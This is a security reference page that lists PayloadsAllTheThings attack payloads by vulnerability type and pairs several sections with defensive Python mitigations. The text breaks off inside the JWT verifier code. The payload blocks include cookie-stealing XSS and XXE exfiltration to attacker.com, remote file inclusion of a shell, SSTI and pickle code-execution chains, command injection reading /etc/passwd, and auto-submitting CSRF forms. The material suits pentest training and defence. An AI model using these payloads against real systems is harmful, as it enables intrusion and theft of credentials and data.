# PayloadsAllTheThings
PayloadsAllTheThings is a massive community-maintained GitHub repository containing attack payloads, security bypasses, and exploitation techniques organized by vulnerability type. Essential reference for pentesting, CTF challenges, and web application security research.
## Repository Structure

| Path | Purpose |
|---|---|
| /XSS/ | Cross-site scripting payloads (reflected, stored, DOM) |
| /SQL Injection/ | Database injection across engines (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) |
| /Command Injection/ | OS command execution payloads |
| /SSRF/ | Server-side request forgery exploits |
| /XXE/ | XML External Entity attack payloads |
| /Directory Traversal/ | Path traversal and traversal bypass techniques |
| /File Inclusion/ | LFI and RFI exploitation patterns |
| /Server Side Template Injection/ | SSTI payloads across frameworks |
| /CORS/ | Cross-Origin Resource Sharing misconfigurations |
| /CSRF/ | Cross-Site Request Forgery techniques |
| /IDOR/ | Insecure Direct Object Reference patterns |
| /Deserialization/ | Java, PHP, Python deserialization gadgets |
## XSS Payloads

### Reflected XSS

```html
<!-- Basic alert -->
<script>alert('XSS')</script>
<!-- Attribute context -->
"><script>alert('XSS')</script>
<!-- Event handler -->
<img src=x onerror="alert('XSS')">
<!-- Unicode/encoding bypass -->
<script>alert(String.fromCharCode(88,83,83))</script>
<!-- SVG context -->
<svg onload="alert('XSS')">
```
### Stored XSS

```html
<!-- Image tag with event -->
<img src=x onerror="fetch('http://attacker.com/steal.php?cookie='+document.cookie)">
<!-- SVG injection -->
<svg/onload="new Image().src='http://attacker.com/log?c='+btoa(document.cookie)">
<!-- HTML5 data attribute -->
<div data-x="`>onclick="eval(this.dataset.x)">Click</div>
<!-- Meta redirect -->
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
```
### DOM XSS

```javascript
// Vulnerable pattern
document.getElementById('output').innerHTML = userInput;
// Payload (if input is: <img src=x onerror="alert('DOM XSS')">)
// Will execute

// Source → Sink patterns
// eval() injection
eval(userInput); // Payload: alert('XSS')
// setTimeout/setInterval
setTimeout(userInput, 1000); // Payload: alert('XSS')
```
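All three XSS variants above land because user data reaches an HTML, attribute, URL or script context without the encoding that context requires. The following is an added example (not code from the page or from the PayloadsAllTheThings project) of server-side output encoding chosen per context, using only the Python standard library; `render_profile` and `injected_tags` are names made up for the demo, and the sample inputs are copies of the payloads listed above. For the DOM sinks shown in the last block the client-side equivalent is assigning to `textContent` instead of `innerHTML` and never passing strings to `eval`, `setTimeout` or `setInterval`.

```python
import html
import json
import re
from urllib.parse import quote

# Constructed sample inputs: the reflected/stored payloads from the blocks above.
SAMPLE_INPUTS = [
    "<script>alert('XSS')</script>",
    "\"><script>alert('XSS')</script>",
    "<img src=x onerror=\"alert('XSS')\">",
    "<svg onload=\"alert('XSS')\">",
]


def render_profile(display_name: str, bio: str) -> str:
    """Build an HTML fragment with an encoder chosen per context (hypothetical view code).
    Element body and attribute values get entity encoding with quotes escaped, the URL
    parameter gets percent-encoding, and the value handed to inline script gets JSON
    encoding with '<' escaped so '</script>' can never close the block early."""
    name_html = html.escape(display_name, quote=True)
    bio_html = html.escape(bio, quote=True)
    search_url = "/search?q=" + quote(display_name, safe="")
    name_js = json.dumps(display_name).replace("<", "\\u003c")
    return (
        f'<h1 data-name="{name_html}">{name_html}</h1>'
        f"<p>{bio_html}</p>"
        f'<a href="{html.escape(search_url, quote=True)}">more</a>'
        f"<script>var user = {name_js};</script>"
    )


def injected_tags(fragment: str, template_tags=("h1", "p", "a", "script")) -> list:
    """Tag names present in the rendered fragment that the template itself did not emit.
    An empty list (together with exactly one <script> from the template) means every
    user-controlled '<' was encoded away."""
    found = re.findall(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", fragment)
    return sorted({t.lower() for t in found} - set(template_tags))


if __name__ == "__main__":
    out = render_profile(SAMPLE_INPUTS[1], SAMPLE_INPUTS[2])
    print(out)
    print("injected tags:", injected_tags(out), "| script blocks:", out.count("<script"))
```

Encoding is applied at output time, not at input time, so the same stored value can be rendered safely in each of the four contexts; a filter that strips `<script>` on the way in would still leave the `onerror=` and `onload=` variants alive.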
## SQL Injection Payloads

### MySQL Injection

```sql
-- Basic union-based
' UNION SELECT 1,2,3,4-- -
-- Extract database name
' UNION SELECT 1,database(),3,4-- -
-- Extract table names
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -
-- Extract columns
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -
-- Time-based blind
' AND SLEEP(5)-- -
```
### MSSQL Injection

```sql
-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract server version
' UNION SELECT 1,@@version,3,4-- -
-- Extract tables
' UNION SELECT 1,name,3,4 FROM sysobjects WHERE xtype='U'-- -
-- Time-based blind
'; WAITFOR DELAY '00:00:05'-- -
```
### PostgreSQL Injection

```sql
-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract database
' UNION SELECT 1,current_database(),3,4-- -
-- Extract tables
' UNION SELECT 1,tablename,3,4 FROM pg_tables WHERE schemaname='public'-- -
-- Time-based blind
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -
```
### SQLite Injection

```sql
-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract table names
' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -
-- Extract columns
' PRAGMA table_info(users);
-- Time-based blind
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END) LIMIT 1-- -
```
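Every payload in the four engine sections above works for one reason: the input is spliced into the SQL text, so a quote ends the literal and the rest becomes grammar. This is an added example (not code from the page or the project) that runs the SQLite table-enumeration payload from the block above against an in-memory `sqlite3` database, once through string concatenation and once through a bound parameter. The schema, the rows and the function names are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: four columns, matching the 4-column UNION payloads above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "alice", "hash-a", "user"), (2, "bob", "hash-b", "admin")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Deliberately vulnerable: the value is concatenated into the statement text,
    so a closing quote, a UNION and a trailing comment all become part of the query."""
    sql = (
        "SELECT id, username, password_hash, role FROM users WHERE username = '"
        + username
        + "'"
    )
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: a bound parameter is sent as data. The same probe string is simply
    compared against the username column and matches nothing."""
    return conn.execute(
        "SELECT id, username, password_hash, role FROM users WHERE username = ?",
        (username,),
    ).fetchall()


# Copy of the SQLite table-name payload from the block above, used as the probe.
PROBE = "' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -"


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", find_user_vulnerable(db, PROBE))   # leaks the table name
    print("parameterised:", find_user_safe(db, PROBE))        # []
```

The parameterised version needs no quoting, escaping or keyword blocklist; the driver never lets the value touch the statement's grammar. The same applies to the `SLEEP`, `WAITFOR` and `pg_sleep` probes on the other engines: bound as a parameter, they are inert strings.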
## Command Injection Payloads

```bash
# Basic command separators
; ls -la
| whoami
|| id
& cat /etc/passwd
&& whoami
# Pipe to bash
command1 | bash
command1 | sh
# Command substitution
$(whoami)
`whoami`
# Environment variable bypass
${IFS}cat${IFS}/etc/passwd
# Glob patterns
cat /etc/passw*
# Null byte injection (older systems)
cat /etc/passwd%00.txt
```
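Separators, substitution and `${IFS}` only mean something to a shell, so the fix is to keep the shell out of the path entirely and to validate the one field that should be a hostname or filename. This is an added example (not from the page or the project): an allow-list hostname check, a child process launched with an argv list and no shell, and `shlex.quote` for the case where a shell string truly cannot be avoided. Python itself stands in for the real tool so the demo runs anywhere; the function names are constructed.

```python
import re
import shlex
import subprocess
import sys

# One DNS label: letters/digits, optional hyphens inside, max 63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def is_valid_hostname(value: str) -> bool:
    """Allow-list check. Every separator and substitution character in the block above
    (; | & $ ` { } * space, and a percent-encoded NUL) fails the pattern."""
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None


def echo_argument(value: str) -> str:
    """Run a child process from an argv list with no shell. Whatever the string contains
    reaches the program as a single argument; it comes back byte-for-byte, showing that
    '$(whoami)' or '; ls -la' was data, not syntax."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


def quote_for_shell(value: str) -> str:
    """Last resort when a shell string is unavoidable: shlex.quote() wraps the value so
    the shell sees exactly one literal word."""
    return shlex.quote(value)


if __name__ == "__main__":
    for probe in ["example.com", "example.com; ls -la", "$(whoami)", "${IFS}cat${IFS}/etc/passwd"]:
        print(f"{probe!r:45} valid={is_valid_hostname(probe)} argv={echo_argument(probe)!r}")
    print(quote_for_shell("; ls -la"))
```

The order matters: validate first, then call with `shell=False`. Quoting alone would still allow a valid-looking but wrong argument (an option such as `--output=/etc/cron.d/x`) to reach the tool, which is why the allow-list is the primary control.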
## SSRF Payloads

```text
# Local file access
http://127.0.0.1/admin
http://localhost:8080
http://[::1]:80/
# Internal IP ranges
http://10.0.0.1
http://172.16.0.0/12
http://192.168.0.0/16
# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/
# Bypass filters
http://127.1
http://localhost:80/../../admin
http://0.0.0.0
# Obfuscation
http://127.0.0.1:80/ → http://2130706433/
http://127.0.0.1 → http://0x7f.0x0.0x0.0x1
```
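The "bypass" and "obfuscation" entries above defeat filters that compare the URL as text. A check that survives them resolves the host to addresses and classifies the addresses. This is an added example (not code from the page or the project) that decodes the `inet_aton()` shorthands (`127.1`, `2130706433`, `0x7f.0x0.0x0.0x1`) itself, so the decision does not depend on which libc the URL library delegates to, and then rejects anything that is not publicly routable. The resolver is injectable; `DEMO_RESOLVER` is a constructed stand-in for DNS so the example runs offline, and the function names are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def parse_legacy_ipv4(host: str):
    """Decode inet_aton() shorthands that strict parsers refuse but sockets accept:
    '2130706433' (one 32-bit number), '127.1' (a.b), '0x7f.0x0.0x0.0x1' (hex parts),
    '0177.0.0.1' (octal parts). Returns an IPv4Address, or None if host is not such a form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for part in parts:
        try:
            if part[:2].lower() == "0x":
                n = int(part[2:], 16)
            elif len(part) > 1 and part[0] == "0":
                n = int(part, 8)
            else:
                n = int(part, 10)
        except ValueError:
            return None
        if n < 0:
            return None
        nums.append(n)
    *lead, last = nums
    if any(n > 255 for n in lead):
        return None
    width = 4 - len(lead)            # the last component fills the remaining bytes
    if last >= 1 << (8 * width):
        return None
    value = 0
    for n in lead:
        value = (value << 8) | n
    return ipaddress.IPv4Address((value << (8 * width)) | last)


def _is_public(ip) -> bool:
    mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:127.0.0.1 hides a v4 loopback
    if mapped is not None:
        ip = mapped
    # is_global is False for loopback, RFC 1918, link-local (169.254.169.254 metadata),
    # 0.0.0.0/8, CGNAT and reserved space; multicast is excluded separately.
    return ip.is_global and not ip.is_multicast


def _default_resolver(host: str) -> list:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_fetch_url(url: str, resolver=_default_resolver) -> bool:
    """True only if the scheme is http(s) and every address the host maps to is public."""
    parts = urlsplit(url)
    host = parts.hostname                    # lower-cased, IPv6 brackets stripped
    if parts.scheme not in ("http", "https") or not host:
        return False
    try:
        ips = [ipaddress.ip_address(host)]   # strict IPv4/IPv6 literal
    except ValueError:
        legacy = parse_legacy_ipv4(host)
        if legacy is not None:
            ips = [legacy]
        else:
            try:
                ips = [ipaddress.ip_address(a) for a in resolver(host)]
            except (socket.gaierror, ValueError):
                return False
    return bool(ips) and all(_is_public(ip) for ip in ips)


# Constructed DNS stand-in so the demo runs offline (addresses are sample values).
DEMO_RESOLVER = lambda host: {
    "metadata.google.internal": ["169.254.169.254"],
    "localhost": ["127.0.0.1", "::1"],
    "public.example": ["11.22.33.44"],
}.get(host, [])
```

Two caveats the check cannot cover by itself: the address must be pinned after validation (connect to the vetted IP rather than resolving again, or the name can be rebound between check and use), and every redirect hop has to be validated the same way, since a public host can answer with `Location: http://169.254.169.254/`.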
## XXE Payloads

```xml
<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>

<!-- Blind XXE with exfiltration -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY exfil SYSTEM "http://attacker.com/log?data=%xxe;">
]>
<data>&exfil;</data>

<!-- Parameter entity injection -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/log?%file;'>">
%eval;
]>

<!-- DTD external (if not filtered) -->
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
```
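Every payload above needs a `DOCTYPE`, either to declare entities inline or to pull in an external DTD, so the simplest robust control is to refuse a DOCTYPE in untrusted input before any entity is processed. This is an added example (not code from the page or the project) using the standard-library Expat parser directly: the DOCTYPE handler aborts the parse, and the external-entity handler is disabled as a second layer. The `defusedxml` package packages the same idea for all stdlib parsers; the names `parse_untrusted_xml` and `xml_is_rejected` are constructed for the demo, and `XXE_SAMPLE` is a copy of the first payload above.

```python
from xml.parsers import expat


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a <!DOCTYPE>."""


def parse_untrusted_xml(data: str) -> dict:
    """Parse with Expat, refusing DOCTYPE declarations outright and refusing to fetch
    external entities. Returns {"root": <root element name>, "text": <all character data>}."""
    parser = expat.ParserCreate()
    state = {"root": None, "text": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Called at the start of the DOCTYPE, before any entity declaration is seen.
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in untrusted input")

    def on_external_entity(context, base, system_id, public_id):
        return 0   # returning 0 makes Expat abort instead of fetching system_id

    def on_start(name, attrs):
        if state["root"] is None:
            state["root"] = name

    def on_text(text):
        state["text"].append(text)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return {"root": state["root"], "text": "".join(state["text"])}


def xml_is_rejected(data: str) -> bool:
    """Convenience wrapper: True if the hardened parser refused the document."""
    try:
        parse_untrusted_xml(data)
        return False
    except (DoctypeRejected, expat.ExpatError):
        return True


# Copy of the "Basic XXE" payload from the block above, used as the probe.
XXE_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>"""

# Constructed benign document for comparison.
BENIGN_SAMPLE = '<?xml version="1.0"?><data attr="1">hello</data>'


if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_SAMPLE))
    print("probe rejected:", xml_is_rejected(XXE_SAMPLE))
```

Refusing the DOCTYPE also closes entity-expansion denial of service ("billion laughs"), which needs no external entity at all. If a format legitimately requires a DTD, the parser must instead be configured to never resolve external entities or external DTDs, and the policy should be verified with a probe like the one above rather than assumed from the library defaults.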
## Directory Traversal Payloads

```text
# Basic traversal
../../../etc/passwd
..\..\..\..\windows\win.ini
# Encoded bypass
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd (double encoding)
# Null byte injection (older systems)
../../../etc/passwd%00.jpg
# Backslash bypass
..\..\..\etc\passwd
# Overlong UTF-8
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
# URL encoding variations
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
## File Inclusion (LFI/RFI)

### Local File Inclusion

```text
# Basic LFI
?page=../../../../etc/passwd
?file=....//....//....//etc//passwd
# Log poisoning (access logs, error logs)
?page=../../../var/log/apache2/access.log
# PHP wrappers
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input (POST data execution)
?file=data:text/plain,<?php phpinfo(); ?>
# Expect wrapper
?file=expect://whoami
```
### Remote File Inclusion

```text
# Basic RFI
?page=http://attacker.com/shell.php
?file=http://attacker.com/payload.txt
# Protocol smuggling
?file=http://attacker.com/payload.php%00
# FTP protocol
?file=ftp://attacker.com/shell.php
```
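The traversal list and the LFI/RFI list above share one fix: never derive a filesystem path or an `include` target from user text by pattern-matching `..`; instead decode once, normalise, and check that the result is still inside the intended directory, or better, map a user-supplied name onto a fixed allow-list. This is an added example (not code from the page or the project) serving both sections; `safe_join`, `include_target`, `PAGES` and the base directories are constructed for the demo.

```python
import os
from urllib.parse import unquote


def safe_join(base_dir: str, user_path: str):
    """Resolve a user-supplied path inside base_dir; return the absolute path or None.
    Decodes exactly once (as the web server would), rejects NUL bytes, treats backslashes
    as separators so Windows-style '..\\' is caught on any platform, strips leading
    slashes so an absolute path cannot escape, then normalises and checks containment."""
    decoded = unquote(user_path)            # "..%2F" -> "../"; "..%252F" -> "..%2F" (stays literal)
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    base = os.path.abspath(base_dir)
    candidate = os.path.normpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed allow-list for a PHP-style "?page=" parameter: the user picks a key,
# the server picks the file. Stream wrappers (php://, data:, expect://, http://)
# never enter the picture because the value is a dictionary key, not a path.
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def include_target(page_param: str):
    """Map ?page=<name> to a file under the pages directory, or None for anything else."""
    filename = PAGES.get(page_param)
    if filename is None:
        return None
    return safe_join("/srv/app/pages", filename)


if __name__ == "__main__":
    base = "/srv/app/static"
    for probe in [
        "css/../img/logo.png",
        "../../../etc/passwd",
        "..%2F..%2F..%2Fetc%2Fpasswd",
        "..%252F..%252F..%252Fetc%252Fpasswd",
        "../../../etc/passwd%00.jpg",
        "..\\..\\..\\etc\\passwd",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    ]:
        print(f"{probe!r:45} -> {safe_join(base, probe)}")
    print(include_target("home"), include_target("../../../../etc/passwd"))
```

Note what happens to the double-encoded probe: after one decode it is the literal filename `..%2F..%2F..%2Fetc%2Fpasswd`, which stays under the base directory and simply does not exist. Overlong UTF-8 (`%c0%af`) decodes to replacement characters rather than a slash for the same reason. The containment check does not need to know any of these encodings; it only needs to run after the single decode the server performs. For `php://filter`, `data:` and `expect://` wrappers the allow-list approach is the relevant one: a dictionary lookup leaves no way to reach a stream wrapper at all.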
## SSTI Payloads

### Jinja2 (Python)

```jinja
{{ 7 * 7 }} # Math evaluation
{{ config }} # Access config
{{ self.__dict__ }} # Object inspection
{{ ''.__class__.__mro__[1].__subclasses__() }} # RCE chain
{{ self._TemplateReference__context }}
```

### Twig (PHP)

```twig
{{ 7 * 7 }}
{{ _self.env.registerUndefinedFilterCallback("exec")}}
{{ _self.env.getFilter("system")("id") }}
```
### ERB (Ruby)

```erb
<%= 7 * 7 %>
<%= system("id") %>
<%= `whoami` %>
```
### Velocity

```velocity
#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($proc=$rt.getRuntime().exec('id'))
```
## CORS Misconfiguration

```text
// Vulnerable backend reflects Origin header
Access-Control-Allow-Origin: *
// Or
Access-Control-Allow-Origin: [user-supplied]

// Exploit patterns
// 1. Wildcard origin
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true // Invalid combo
// 2. Null origin bypass
Access-Control-Allow-Origin: null
// 3. Subdomain bypass
Origin: attacker.victim.com
// Server accepts: *.victim.com
// 4. Regex bypass
Origin: victim.com.attacker.com
// Server regex: victim.com
```
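Patterns 2 through 4 above are all failures of the same function: the one that turns a request `Origin` into an `Access-Control-Allow-Origin` response header. This is an added example (not code from the page or the project) of that function written as an exact-match allow-list, with an optional subdomain mode that compares the parsed hostname on a dot boundary rather than with a substring or an unanchored regex. The origins, the suffix and `cors_headers` are constructed for the demo.

```python
from urllib.parse import urlsplit

# Constructed allow-list. Exact origins, scheme included.
ALLOWED_ORIGINS = {"https://app.victim.example", "https://admin.victim.example"}
# Constructed suffix for the optional subdomain mode (leading dot is the boundary).
ALLOWED_SUFFIX = ".victim.example"


def cors_headers(origin, allow_subdomains: bool = False) -> dict:
    """Return the CORS response headers for a request Origin, or {} to deny.
    Never reflect an arbitrary origin, never accept 'null', never pair '*' with
    credentials. Suffix matching uses the parsed hostname with a dot boundary, so
    'victim.example.attacker.example' and 'https://app.victim.example.attacker.example'
    cannot pass as subdomains."""
    if not origin or origin == "null":
        return {}
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.hostname:
        return {}
    if parts.path or parts.query or parts.fragment or parts.username is not None:
        return {}                       # a real Origin header is scheme://host[:port] only
    if origin in ALLOWED_ORIGINS:
        return _allow(origin)
    if allow_subdomains and parts.hostname.endswith(ALLOWED_SUFFIX):
        return _allow(origin)
    return {}


def _allow(origin: str) -> dict:
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",               # keeps caches from serving one origin's answer to another
    }


if __name__ == "__main__":
    for o in ["https://app.victim.example", "null", "https://attacker.victim.example",
              "https://victim.example.attacker.example", "http://app.victim.example"]:
        print(f"{o:45} exact={bool(cors_headers(o))} subdomains={bool(cors_headers(o, True))}")
```

The subdomain mode is the trade-off behind pattern 3: once every `*.victim.example` origin is trusted with credentials, an XSS on any one subdomain reaches the API with the victim's cookies, so the exact list is the safer default and the suffix mode should be a deliberate, documented decision.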
## CSRF Payloads

```html
<!-- Image tag (GET request) -->
<img src="http://target.com/admin/delete?id=1">

<!-- Form submission (POST) -->
<form action="http://target.com/admin/delete" method="POST">
  <input type="hidden" name="id" value="1">
  <input type="submit">
</form>
<script>document.forms[0].submit();</script>

<!-- Fetch request -->
<script>
fetch('http://target.com/admin/delete', {
  method: 'POST',
  credentials: 'include',
  body: 'id=1'
});
</script>

<!-- XMLHttpRequest -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/admin/delete', true);
xhr.withCredentials = true;
xhr.send('id=1');
</script>
```
## IDOR (Insecure Direct Object Reference)

```text
# Sequential ID enumeration
/api/users/1
/api/users/2
/api/users/3
# Parameter manipulation
/profile?id=100 → /profile?id=101, 102, 103...
# Hash/token prediction
/invoice?token=abc123 → /invoice?token=abc124...
# UUID/GUID patterns
/documents/550e8400-e29b-41d4-a716-446655440000
# Increment least significant digits
# Encoded ID manipulation
/user?id=MQ%3D%3D (base64: MQ== = 1)
# Try MQ%3D%3D, Mi%3D%3D, Mw%3D%3D...
# Horizontal escalation
/api/orders/my-orders (returns user 1's orders)
# Bypass: /api/orders/other-user-id/orders
```
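Whether the identifier is sequential, base64-wrapped or a UUID changes only how quickly it can be guessed; the vulnerability is the missing ownership check on the server. This is an added example (not code from the page or the project) with two defender-side pieces: a lookup that enforces ownership after the key lookup, and a detector that runs over access-log lines and flags sessions touching many distinct object ids in sequence, the signature of the enumeration shown above. The `ORDERS` store, the log lines and the function names are all constructed.

```python
import re
from collections import defaultdict

# Constructed object store: order id -> record with its owner.
ORDERS = {101: {"owner": 1, "total": 20}, 102: {"owner": 2, "total": 35}}


class Forbidden(Exception):
    pass


def get_order(order_id: int, current_user: int) -> dict:
    """Look the object up by key, then enforce ownership server-side. Returning the same
    error for 'missing' and 'not yours' avoids confirming which ids exist."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != current_user:
        raise Forbidden(f"user {current_user} may not read order {order_id}")
    return order


def can_read_order(order_id: int, current_user: int) -> bool:
    try:
        get_order(order_id, current_user)
        return True
    except Forbidden:
        return False


# Constructed access-log format: <timestamp> session=<id> "GET <path>"
LOG_RE = re.compile(r'^(?P<ts>\S+) session=(?P<sess>\S+) "GET /api/users/(?P<id>\d+)"')

# Constructed sample log: one session walks ids 1..6, another fetches a single id.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z session=s-aaaa "GET /api/users/1"
2024-05-01T10:00:02Z session=s-aaaa "GET /api/users/2"
2024-05-01T10:00:02Z session=s-aaaa "GET /api/users/3"
2024-05-01T10:00:03Z session=s-aaaa "GET /api/users/4"
2024-05-01T10:00:03Z session=s-aaaa "GET /api/users/5"
2024-05-01T10:00:04Z session=s-aaaa "GET /api/users/6"
2024-05-01T10:00:09Z session=s-bbbb "GET /api/users/7"
2024-05-01T10:00:10Z session=s-bbbb "GET /api/orders/102"
"""


def enumeration_suspects(log_text: str, threshold: int = 5) -> dict:
    """Flag sessions that request at least `threshold` distinct user ids, and count how many
    of those ids were consecutive. A legitimate client rarely walks ids in order."""
    ids_by_session = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ids_by_session[m["sess"]].add(int(m["id"]))
    report = {}
    for sess, ids in ids_by_session.items():
        if len(ids) >= threshold:
            ordered = sorted(ids)
            consecutive = sum(1 for a, b in zip(ordered, ordered[1:]) if b - a == 1)
            report[sess] = {"distinct_ids": len(ids), "consecutive_steps": consecutive}
    return report


if __name__ == "__main__":
    print(can_read_order(101, 1), can_read_order(102, 1))
    print(enumeration_suspects(SAMPLE_LOG))
```

The detector is a triage signal, not a control: a session that reads six profiles in four seconds deserves a look, but only the ownership check in `get_order` actually prevents the disclosure. In a real pipeline the threshold would be tuned per endpoint and the window bounded in time.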
## Deserialization Attacks

### Java (ysoserial gadgets)

```bash
# Generate payload with ysoserial
java -jar ysoserial.jar CommonsCollections5 'command' | base64
# Common gadget chains
CommonsCollections
CommonsCollections5
CommonsCollections6
Spring1
Spring2
JRMP
JMXBean
```
### PHP

```php
// Vulnerable pattern
unserialize($_GET['data']);
// Gadget-based RCE
O:4:"Test":2:{s:4:"func";s:6:"system";s:3:"arg";s:2:"id";}
// Magic method exploitation
__wakeup()
__destruct()
__toString()
__get()
__set()
```
### Python Pickle

```python
# Vulnerable
pickle.loads(user_data)
# RCE gadget
import pickle, subprocess
payload = pickle.dumps(subprocess.Popen(['id']))
```
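`pickle.loads` on untrusted bytes is unsafe because the format can name any importable global and call it. The only stdlib-level mitigation is the one the Python documentation describes: subclass `Unpickler` and make `find_class` refuse everything not on an allow-list. This is an added example (not code from the page or the project) of that pattern, with a probe that merely *references* `subprocess.Popen` through the protocol-0 `GLOBAL` opcode (nothing is called or executed) to show the difference between the two loaders. `SAFE_BUILTINS`, `RestrictedUnpickler` and the sample data are constructed.

```python
import builtins
import io
import pickle

# Constructed allow-list. Extend it name by name; never wildcard a module.
SAFE_BUILTINS = {"range", "slice", "set", "frozenset"}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class() is the hook every GLOBAL/STACK_GLOBAL lookup passes through.
    Denying it here is how the stdlib documentation recommends restricting pickle."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def vanilla_loads(data: bytes):
    """The pattern from the block above: no restriction at all."""
    return pickle.loads(data)


def unpickle_is_blocked(data: bytes) -> bool:
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


# Constructed probe: the GLOBAL opcode ('c' module NL name NL) followed by STOP ('.').
# It resolves subprocess.Popen and returns the class object; it does not call it.
PROBE = b"csubprocess\nPopen\n."

# Constructed benign payload: containers and scalars only, no globals.
BENIGN = pickle.dumps({"user": "alice", "ids": [1, 2, 3]})


if __name__ == "__main__":
    print("vanilla resolves:", vanilla_loads(PROBE))        # <class 'subprocess.Popen'>
    print("restricted blocks probe:", unpickle_is_blocked(PROBE))
    print("restricted loads benign:", restricted_loads(BENIGN))
```

Even restricted, pickle remains a poor choice for data that crosses a trust boundary; where the data is plain values, JSON with schema validation removes the problem entirely, and the restricted unpickler is the fallback for legacy formats that cannot be replaced.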
## JWT Attacks

```text
// 1. Algorithm confusion (none algorithm)
// Modify header: {"alg":"none","typ":"JWT"}
// Signature: empty
// 2. Weak signature
// Crack with: hashcat, john, jwt-cracker
// 3. Public key injection
// If server uses asymmetric, swap with public key
// 4. Key confusion
// Modify alg from RS256 to HS256, use public cert as HMAC key
// 5. Expired token bypass
// Modify exp claim

// Example modified JWT
eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0.
```
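Attacks 1, 3 and 4 above all exploit a verifier that lets the token's own `alg` header choose the algorithm and therefore the key type; attack 5 exploits a verifier that skips `exp`. This is an added example (not code from the page or the project) of an HS256 verifier written with only the standard library that fixes the algorithm by server configuration, compares the signature in constant time, and requires a future `exp`. `sign_hs256` exists only to build fixtures; `NONE_TOKEN` is a copy of the example token above, and the key and claims are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

REQUIRED_ALG = "HS256"   # fixed by server configuration, never read from the token


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


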